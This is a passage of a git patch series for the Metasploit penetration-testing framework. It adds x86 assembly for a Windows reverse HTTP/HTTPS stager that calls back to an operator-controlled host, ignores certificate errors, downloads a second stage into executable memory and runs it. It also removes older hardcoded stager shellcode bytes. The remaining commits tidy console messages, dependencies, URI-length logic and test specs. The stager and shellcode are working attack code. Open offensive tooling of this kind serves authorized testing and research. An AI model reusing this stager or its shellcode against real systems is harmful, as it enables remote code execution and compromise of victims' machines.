server_host; server_uri is saved in EDI for later + db "#{opts[:url]}", 0x00 + got_server_host: + push eax ; HINTERNET hInternet + push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" ) + call ebp + + httpopenrequest: + ; dwContext (NULL) [8] + push #{"0x%.8x" % http_open_flags} ; dwFlags + push ebx ; accept types + push ebx ; referrer + push ebx ; version + push edi ; server URI + push ebx ; method + push eax ; hConnection + push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" ) + call ebp + xchg esi, eax ; save hHttpRequest in esi + + send_request: + ^ + + if opts[:ssl] + asm << %Q^ + ; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) ); + set_security_options: + push 0x00003380 + ;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID + ;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID + ;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE + ;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA + ;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION + mov eax, esp + push.i8 4 ; sizeof(dwFlags) + push eax ; &dwFlags + push.i8 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS) + push esi ; hHttpRequest + push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) + call ebp + ^ + end + + asm << %Q^ + httpsendrequest: + push ebx ; lpOptional length (0) + push ebx ; lpOptional (NULL) + push ebx ; dwHeadersLength (0) + push ebx ; lpszHeaders (NULL) + push esi ; hHttpRequest + push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" ) + call ebp + test eax,eax + jnz allocate_memory + + try_it_again: + dec edi + jnz send_request + + ; if we didn't allocate before running out of retries, bail out + ^ + + if opts[:exitfunk] + asm << %Q^ + failure: + call exitfunk + ^ + else + asm << %Q^ + failure: + push 0x56A2B5F0 ; hardcoded to exitprocess for size + call ebp + ^ + end + + asm << %Q^ + allocate_memory: + push.i8 0x40 ; PAGE_EXECUTE_READWRITE + push 0x1000 ; MEM_COMMIT + push 0x00400000 ; Stage allocation (4Mb ought to do us) + push ebx ; NULL as we dont care where the allocation is + push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) + call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); + + download_prep: + xchg eax, ebx ; place the allocated base address in ebx + push ebx ; store a copy of the stage base address on the stack + push ebx ; temporary storage for bytes read count + mov edi, esp ; &bytesRead + + download_more: + push edi ; &bytesRead + push 8192 ; read length + push ebx ; buffer + push esi ; hRequest + push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) + call ebp + + test eax,eax ; download failed? (optional?) + jz failure + + mov eax, [edi] + add ebx, eax ; buffer += bytes_received + + test eax,eax ; optional? + jnz download_more ; continue until it returns 0 + pop eax ; clear the temporary storage + + execute_stage: + ret ; dive into the stored stage address + + got_server_uri: + pop edi + call got_server_host + + server_host: + db "#{opts[:host]}", 0x00 + ^ + + if opts[:exitfunk] + asm << asm_exitfunk(opts) + end + asm + end + + # + # Do not transmit the stage over the connection. We handle this via HTTPS + # + def stage_over_connection? + false + end + + # + # Always wait at least 20 seconds for this payload (due to staging delays) + # + def wfs_delay + 20 + end + + +end + +end + diff --git a/lib/msf/core/payload/windows/reverse_https.rb b/lib/msf/core/payload/windows/reverse_https.rb new file mode 100644 index 0000000000..b22ebbe048 --- /dev/null +++ b/lib/msf/core/payload/windows/reverse_https.rb @@ -0,0 +1,63 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/reverse_http' + +module Msf + + +### +# +# Complex payload generation for Windows ARCH_X86 that speak HTTPS +# +### + + +module Payload::Windows::ReverseHttps + + include Msf::Payload::Windows::ReverseHttp + + # + # Generate and compile the stager + # + def generate_reverse_https(opts={}) + combined_asm = %Q^ + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. + #{asm_block_api} + start: + pop ebp + #{asm_reverse_http(opts)} + ^ + Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string + end + + # + # Generate the first stage + # + def generate + + # Generate the simple version of this stager if we don't have enough space + if self.available_space.nil? || required_space > self.available_space + return generate_reverse_https( + host: datastore['LHOST'], + port: datastore['LPORT'], + url: "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW), + ssl: true) + end + + conf = { + ssl: true, + host: datastore['LHOST'], + port: datastore['LPORT'], + url: generate_uri, + exitfunk: datastore['EXITFUNC'] + } + + generate_reverse_https(conf) + end + +end + +end + diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index d4b6328d7c..94bb21082d 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb @@ -6,14 +6,15 @@ require 'msf/core' require 'msf/core/handler/reverse_http' - +require 'msf/core/payload/windows/reverse_http' module Metasploit3 - CachedSize = 322 + CachedSize = 306 include Msf::Payload::Stager include Msf::Payload::Windows + include Msf::Payload::Windows::ReverseHttp def initialize(info = {}) super(merge_info(info, @@ -24,68 +25,6 @@ module Metasploit3 'Platform' => 'win', 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::ReverseHttp, - 'Convention' => 'sockedi http', - 'Stager' => - { - 'Offsets' => - { - # Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now) - # 'EXITFUNC' => [ 240, 'V' ], - 'LPORT' => [ 177, 'v' ], # Not a typo, really little endian - }, - 'Payload' => - "\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" + - "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" + - "\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" + - "\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" + - "\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" + - "\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" + - "\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" + - "\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" + - "\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x6E\x65\x74\x00\x68\x77" + - "\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x6A\x08\x5F\x31\xDB" + - "\x89\xF9\x53\xE2\xFD\x68\x3A\x56\x79\xA7\xFF\xD5\x6A\x03\x53\x53" + - "\x68\x5C\x11\x00\x00\xE8\x72\x00\x00\x00\x2F\x31\x32\x33\x34\x35" + - "\x00\x50\x68\x57\x89\x9F\xC6\xFF\xD5\x68\x00\x02\x60\x84\x53\x53" + - "\x53\x57\x53\x50\x68\xEB\x55\x2E\x3B\xFF\xD5\x96\x53\x53\x53\x53" + - "\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x0A\x4F\x75\xED\x68" + - "\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00" + - "\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57" + - "\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0" + - "\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\x5F\xE8\x8F\xFF" + - "\xFF\xFF" - } - )) - end - - # - # Do not transmit the stage over the connection. We handle this via HTTPS - # - def stage_over_connection? - false - end - - # - # Generate the first stage - # - def generate - p = super - i = p.index("/12345\x00") - u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00" - p[i, u.length] = u - - lhost = datastore['LHOST'] || '127.127.127.127' - if Rex::Socket.is_ipv6?(lhost) - lhost = "[#{lhost}]" - end - - p + lhost + "\x00" - end - - # - # Always wait at least 20 seconds for this payload (due to staging delays) - # - def wfs_delay - 20 + 'Convention' => 'sockedi http')) end end diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index 2821b0be3c..92ea6ee42f 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -6,14 +6,16 @@ require 'msf/core' require 'msf/core/handler/reverse_https' +require 'msf/core/payload/windows/reverse_https' module Metasploit3 - CachedSize = 327 + CachedSize = 326 include Msf::Payload::Stager include Msf::Payload::Windows + include Msf::Payload::Windows::ReverseHttps def initialize(info = {}) super(merge_info(info, @@ -24,64 +26,7 @@ module Metasploit3 'Platform' => 'win', 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::ReverseHttps, - 'Convention' => 'sockedi https', - 'Stager' => - { - 'Offsets' => - { - # Disabled since it MUST be ExitProcess to work on WoW64 unless we add EXITFUNK support (too big right now) - # 'EXITFUNC' => [ 260, 'V' ], - 'LPORT' => [ 177, 'v' ], # Not a typo, really little endian - }, - 'Payload' => - "\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" + - "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" + - "\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" + - "\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" + - "\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" + - "\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" + - "\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" + - "\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" + - "\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x6E\x65\x74\x00\x68\x77" + - "\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x6A\x08\x5F\x31\xDB" + - "\x89\xF9\x53\xE2\xFD\x68\x3A\x56\x79\xA7\xFF\xD5\x6A\x03\x53\x53" + - "\x68\x5C\x11\x00\x00\xE8\x86\x00\x00\x00\x2F\x31\x32\x33\x34\x35" + - "\x00\x50\x68\x57\x89\x9F\xC6\xFF\xD5\x68\x00\x32\xE0\x84\x53\x53" + - "\x53\x57\x53\x50\x68\xEB\x55\x2E\x3B\xFF\xD5\x96\x68\x80\x33\x00" + - "\x00\x89\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5" + - "\x53\x53\x53\x53\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x0A" + - "\x4F\x75\xD9\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00" + - "\x00\x68\x00\x00\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53" + - "\x53\x89\xE7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2" + - "\xFF\xD5\x85\xC0\x74\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3" + - "\x5F\xE8\x7B\xFF\xFF\xFF" - - } - )) + 'Convention' => 'sockedi https')) end - # - # Do not transmit the stage over the connection. We handle this via HTTPS - # - def stage_over_connection? - false - end - - # - # Generate the first stage - # - def generate - p = super - i = p.index("/12345\x00") - u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00" - p[i, u.length] = u - p + datastore['LHOST'].to_s + "\x00" - end - - # - # Always wait at least 20 seconds for this payload (due to staging delays) - # - def wfs_delay - 20 - end end diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb index ee236022f8..08fe6ef5a6 100644 --- a/modules/payloads/stagers/windows/x64/reverse_https.rb +++ b/modules/payloads/stagers/windows/x64/reverse_https.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' - +#require 'msf/core/payload/windows/x64/reverse_https' module Metasploit3 diff --git a/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb b/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb index 51d83619a3..7051b82e5a 100644 --- a/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb +++ b/spec/lib/msf/core/handler/reverse_http/uri_checksum_spec.rb @@ -9,6 +9,7 @@ describe Msf::Handler::ReverseHttp::UriChecksum do subject(:dummy_object) { DummyClass.new } it { should respond_to :generate_uri_checksum} + it { should respond_to :generate_uri_checksum_with_length} it { should respond_to :process_uri_resource} describe '#generate_uri_checksum' do @@ -28,6 +29,18 @@ describe Msf::Handler::ReverseHttp::UriChecksum do end end + describe '#generate_uri_checksum_with_length' do + [0, 80, 88, 90, 92, 98, 255, 127].each do |checksum_value| + [5,30,50,100,127].each do |uri_length| + it "generates a #{uri_length} byte string that checksums back to the original value (#{checksum_value})" do + uri_string = dummy_object.generate_uri_checksum_with_length(checksum_value, uri_length) + expect(Rex::Text.checksum8(uri_string)).to eq checksum_value + end + end + end + + end + describe '#process_uri_resource' do context 'when passed a value for INITW' do let(:uri) { "/7E37v"} From 72e76913002b08242b45ee6171373f76bc6575f5 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 10 Mar 2015 13:31:25 -0500 Subject: [PATCH 09/18] Change print_status to print_error And drop db_disconnect note to another line. --- lib/msf/ui/console/command_dispatcher/db.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 0ba92f5c4c..eabc730917 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1713,8 +1713,8 @@ class Db cdb = conn.current_database end end - print_status("#{framework.db.driver} already connected to #{cdb}. " + - "Run db_disconnect first if you wish to connect to a different database.") + print_error("#{framework.db.driver} already connected to #{cdb}") + print_error("Run db_disconnect first if you wish to connect to a different database") return end if (args[0] == "-y") From 3c7b061e0579762e55253b4316dc39b276d15a07 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 10 Mar 2015 14:03:13 -0500 Subject: [PATCH 10/18] Use single quotes But I like double quotes. :( --- lib/msf/ui/console/command_dispatcher/db.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index eabc730917..38a02710e5 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1687,7 +1687,7 @@ class Db return if not db_check_driver if framework.db.connection_established? - cdb = "" + cdb = '' ::ActiveRecord::Base.connection_pool.with_connection do |conn| if conn.respond_to?(:current_database) cdb = conn.current_database @@ -1707,14 +1707,14 @@ class Db def cmd_db_connect(*args) return if not db_check_driver if args[0] != '-h' && framework.db.connection_established? - cdb = "" + cdb = '' ::ActiveRecord::Base.connection_pool.with_connection do |conn| if conn.respond_to?(:current_database) cdb = conn.current_database end end print_error("#{framework.db.driver} already connected to #{cdb}") - print_error("Run db_disconnect first if you wish to connect to a different database") + print_error('Run db_disconnect first if you wish to connect to a different database') return end if (args[0] == "-y") From 261159aa660b10371a720ad616bac05d670e095d Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 10 Mar 2015 14:38:01 -0500 Subject: [PATCH 11/18] update lockfile --- Gemfile.lock | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 747550796d..fa2547a62f 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -22,7 +22,7 @@ PATH tzinfo metasploit-framework-db (4.11.0.pre.dev) activerecord (>= 3.2.21, < 4.0.0) - metasploit-credential (~> 0.14.2) + metasploit-credential (~> 0.14.3) metasploit-framework (= 4.11.0.pre.dev) metasploit_data_models (~> 0.23.0) pg (>= 0.11) @@ -112,7 +112,7 @@ GEM metasploit-concern (0.3.0) activesupport (~> 3.0, >= 3.0.0) railties (< 4.0.0) - metasploit-credential (0.14.2) + metasploit-credential (0.14.3) metasploit-concern (~> 0.3.0) metasploit-model (~> 0.29.0) metasploit_data_models (~> 0.23.0) From dedf3726ea975321f0c24573557615b22ce1218e Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 10 Mar 2015 15:12:02 -0500 Subject: [PATCH 12/18] Simplify the uri_req_len logic, thanks @bcook-r7 --- lib/msf/core/payload/windows/reverse_http.rb | 24 +++++++++----------- 1 file changed, 11 insertions(+), 13 deletions(-) diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index c6bb96b3c4..763b9f1d25 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -77,21 +77,19 @@ module Payload::Windows::ReverseHttp uri_max_len = 256 - "#{datastore['LHOST']}:#{datastore['LPORT']}/".length uri_req_len = datastore['HTTPStagerURILength'].to_i - if uri_req_len > 0 - - if uri_req_len > uri_max_len - raise ArgumentError, "Maximum HTTPStagerURILength is #{uri_max_len}" - end - - if uri_req_len < 5 - raise ArgumentError, "Minimum HTTPStagerURILength is 5" - end - - return "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, uri_req_len) + if uri_req_len == 0 + uri_req_len = 30 + rand(uri_max_len-30) end - # Generate a random 30+ byte URI - "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, 30 + rand(uri_max_len-30)) + if uri_req_len > uri_max_len + raise ArgumentError, "Maximum HTTPStagerURILength is #{uri_max_len}" + end + + if uri_req_len < 5 + raise ArgumentError, "Minimum HTTPStagerURILength is 5" + end + + "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, uri_req_len) end # From 5f382e539a96e4cc545f98dc87273df899dc6ba2 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 10 Mar 2015 15:17:09 -0500 Subject: [PATCH 13/18] Updated required_space to count all 256 bytes of the URL --- lib/msf/core/payload/windows/reverse_http.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index 763b9f1d25..f8fd67a4c1 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -102,8 +102,8 @@ module Payload::Windows::ReverseHttp # Add 100 bytes for the encoder to have some room space += 100 - # Add 251 bytes for large URI support (technically a little less, but lets go with it) - space += 251 + # Make room for the maximum possible URL length + space += 256 # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others) space += 31 From 1d17e9ab5b46e95dfffd081b8d5b1f14a6e691b9 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 10 Mar 2015 15:27:04 -0500 Subject: [PATCH 14/18] Remove the 256 byte limit for URLs --- lib/msf/core/payload/windows/reverse_http.rb | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index f8fd67a4c1..5cd16869ca 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -26,7 +26,7 @@ module Payload::Windows::ReverseHttp super register_advanced_options( [ - OptInt.new('HTTPStagerURILength', [false, 'The URI length for the stager (5 to 240ish bytes)']) + OptInt.new('HTTPStagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']) ], self.class) end @@ -73,16 +73,12 @@ module Payload::Windows::ReverseHttp # Generate the URI for the initial stager # def generate_uri - # Maximum URL is limited to https:// plus 256 bytes, figure out our maximum URI - uri_max_len = 256 - "#{datastore['LHOST']}:#{datastore['LPORT']}/".length + uri_req_len = datastore['HTTPStagerURILength'].to_i + # Choose a random URI length between 30 and 255 bytes if uri_req_len == 0 - uri_req_len = 30 + rand(uri_max_len-30) - end - - if uri_req_len > uri_max_len - raise ArgumentError, "Maximum HTTPStagerURILength is #{uri_max_len}" + uri_req_len = 30 + rand(256-30) end if uri_req_len < 5 From 9ade107325af97015fac231c9939118bb51aeba4 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 10 Mar 2015 16:54:56 -0500 Subject: [PATCH 15/18] disable reverse_http methods from upexec and shell payloads These don't work over http and don't appear to have ever, as far back as I could test. They appear to be an accident perhaps. --- modules/payloads/stages/windows/shell.rb | 2 +- modules/payloads/stages/windows/upexec.rb | 2 +- modules/payloads/stages/windows/x64/shell.rb | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/payloads/stages/windows/shell.rb b/modules/payloads/stages/windows/shell.rb index 70411fa234..80f95c50f6 100644 --- a/modules/payloads/stages/windows/shell.rb +++ b/modules/payloads/stages/windows/shell.rb @@ -23,7 +23,7 @@ module Metasploit3 'Session' => Msf::Sessions::CommandShellWindows, 'PayloadCompat' => { - 'Convention' => 'sockedi -https' + 'Convention' => 'sockedi -http -https' }, 'Stage' => { diff --git a/modules/payloads/stages/windows/upexec.rb b/modules/payloads/stages/windows/upexec.rb index eae0067d3a..1d833ed93a 100644 --- a/modules/payloads/stages/windows/upexec.rb +++ b/modules/payloads/stages/windows/upexec.rb @@ -23,7 +23,7 @@ module Metasploit3 'Session' => Msf::Sessions::CommandShellWindows, 'PayloadCompat' => { - 'Convention' => 'sockedi -https' + 'Convention' => 'sockedi -http -https' }, 'Stage' => { diff --git a/modules/payloads/stages/windows/x64/shell.rb b/modules/payloads/stages/windows/x64/shell.rb index 7e325830ae..4e511bd5ff 100644 --- a/modules/payloads/stages/windows/x64/shell.rb +++ b/modules/payloads/stages/windows/x64/shell.rb @@ -23,7 +23,7 @@ module Metasploit3 'Session' => Msf::Sessions::CommandShellWindows, 'PayloadCompat' => { - 'Convention' => 'sockrdi' + 'Convention' => 'sockrdi -http -https' }, 'Stage' => { From a89926b6634043caa7a42727bf87170e225c858b Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 11 Mar 2015 00:46:04 -0500 Subject: [PATCH 16/18] Exclude vncinject from http stagers (depends on sockedi) --- modules/payloads/stages/windows/vncinject.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb index efb9919940..2a634ddf58 100644 --- a/modules/payloads/stages/windows/vncinject.rb +++ b/modules/payloads/stages/windows/vncinject.rb @@ -25,7 +25,8 @@ module Metasploit3 'Name' => 'VNC Server (Reflective Injection)', 'Description' => 'Inject a VNC Dll via a reflective loader (staged)', 'Author' => [ 'sf' ], - 'Session' => Msf::Sessions::VncInject )) + 'Session' => Msf::Sessions::VncInject + 'Convention' => 'sockedi -http -https')) end From cb1a1ef692701403becc81e8bd6caf289732264a Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 11 Mar 2015 00:46:24 -0500 Subject: [PATCH 17/18] Remove bad stager+stage combinations from the payload set --- spec/modules/payloads_spec.rb | 121 ---------------------------------- 1 file changed, 121 deletions(-) diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index b5a171207d..698833c62a 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -2991,39 +2991,6 @@ describe 'modules/payloads', :content do reference_name: 'windows/shell/find_tag' end - context 'windows/shell/reverse_hop_http' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/windows/reverse_hop_http', - 'stages/windows/shell' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'windows/shell/reverse_hop_http' - end - - context 'windows/shell/reverse_http' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/windows/reverse_http', - 'stages/windows/shell' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'windows/shell/reverse_http' - end - - context 'windows/shell/reverse_http_proxy_pstore' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/windows/reverse_http_proxy_pstore', - 'stages/windows/shell' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'windows/shell/reverse_http_proxy_pstore' - end - context 'windows/shell/reverse_ipv6_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -3217,39 +3184,6 @@ describe 'modules/payloads', :content do reference_name: 'windows/upexec/find_tag' end - context 'windows/upexec/reverse_hop_http' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/windows/reverse_hop_http', - 'stages/windows/upexec' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'windows/upexec/reverse_hop_http' - end - - context 'windows/upexec/reverse_http' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/windows/reverse_http', - 'stages/windows/upexec' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'windows/upexec/reverse_http' - end - - context 'windows/upexec/reverse_http_proxy_pstore' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/windows/reverse_http_proxy_pstore', - 'stages/windows/upexec' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'windows/upexec/reverse_http_proxy_pstore' - end - context 'windows/upexec/reverse_ipv6_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -3393,39 +3327,6 @@ describe 'modules/payloads', :content do reference_name: 'windows/vncinject/find_tag' end - context 'windows/vncinject/reverse_hop_http' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/windows/reverse_hop_http', - 'stages/windows/vncinject' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'windows/vncinject/reverse_hop_http' - end - - context 'windows/vncinject/reverse_http' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/windows/reverse_http', - 'stages/windows/vncinject' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'windows/vncinject/reverse_http' - end - - context 'windows/vncinject/reverse_http_proxy_pstore' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/windows/reverse_http_proxy_pstore', - 'stages/windows/vncinject' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'windows/vncinject/reverse_http_proxy_pstore' - end - context 'windows/vncinject/reverse_ipv6_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -3578,17 +3479,6 @@ describe 'modules/payloads', :content do reference_name: 'windows/x64/shell/bind_tcp' end - context 'windows/x64/shell/reverse_https' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/windows/x64/reverse_https', - 'stages/windows/x64/shell' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'windows/x64/shell/reverse_https' - end - context 'windows/x64/shell/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ @@ -3631,17 +3521,6 @@ describe 'modules/payloads', :content do reference_name: 'windows/x64/vncinject/bind_tcp' end - context 'windows/x64/vncinject/reverse_https' do - it_should_behave_like 'payload cached size is consistent', - ancestor_reference_names: [ - 'stagers/windows/x64/reverse_https', - 'stages/windows/x64/vncinject' - ], - dynamic_size: false, - modules_pathname: modules_pathname, - reference_name: 'windows/x64/vncinject/reverse_https' - end - context 'windows/x64/vncinject/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ From ad39adf9c2d9ef73609ab177a291187abe300a69 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Wed, 11 Mar 2015 00:49:07 -0500 Subject: [PATCH 18/18] Missing comma --- modules/payloads/stages/windows/vncinject.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb index 2a634ddf58..5f78fd44ac 100644 --- a/modules/payloads/stages/windows/vncinject.rb +++ b/modules/payloads/stages/windows/vncinject.rb @@ -25,7 +25,7 @@ module Metasploit3 'Name' => 'VNC Server (Reflective Injection)', 'Description' => 'Inject a VNC Dll via a reflective loader (staged)', 'Author' => [ 'sf' ], - 'Session' => Msf::Sessions::VncInject + 'Session' => Msf::Sessions::VncInject, 'Convention' => 'sockedi -http -https')) end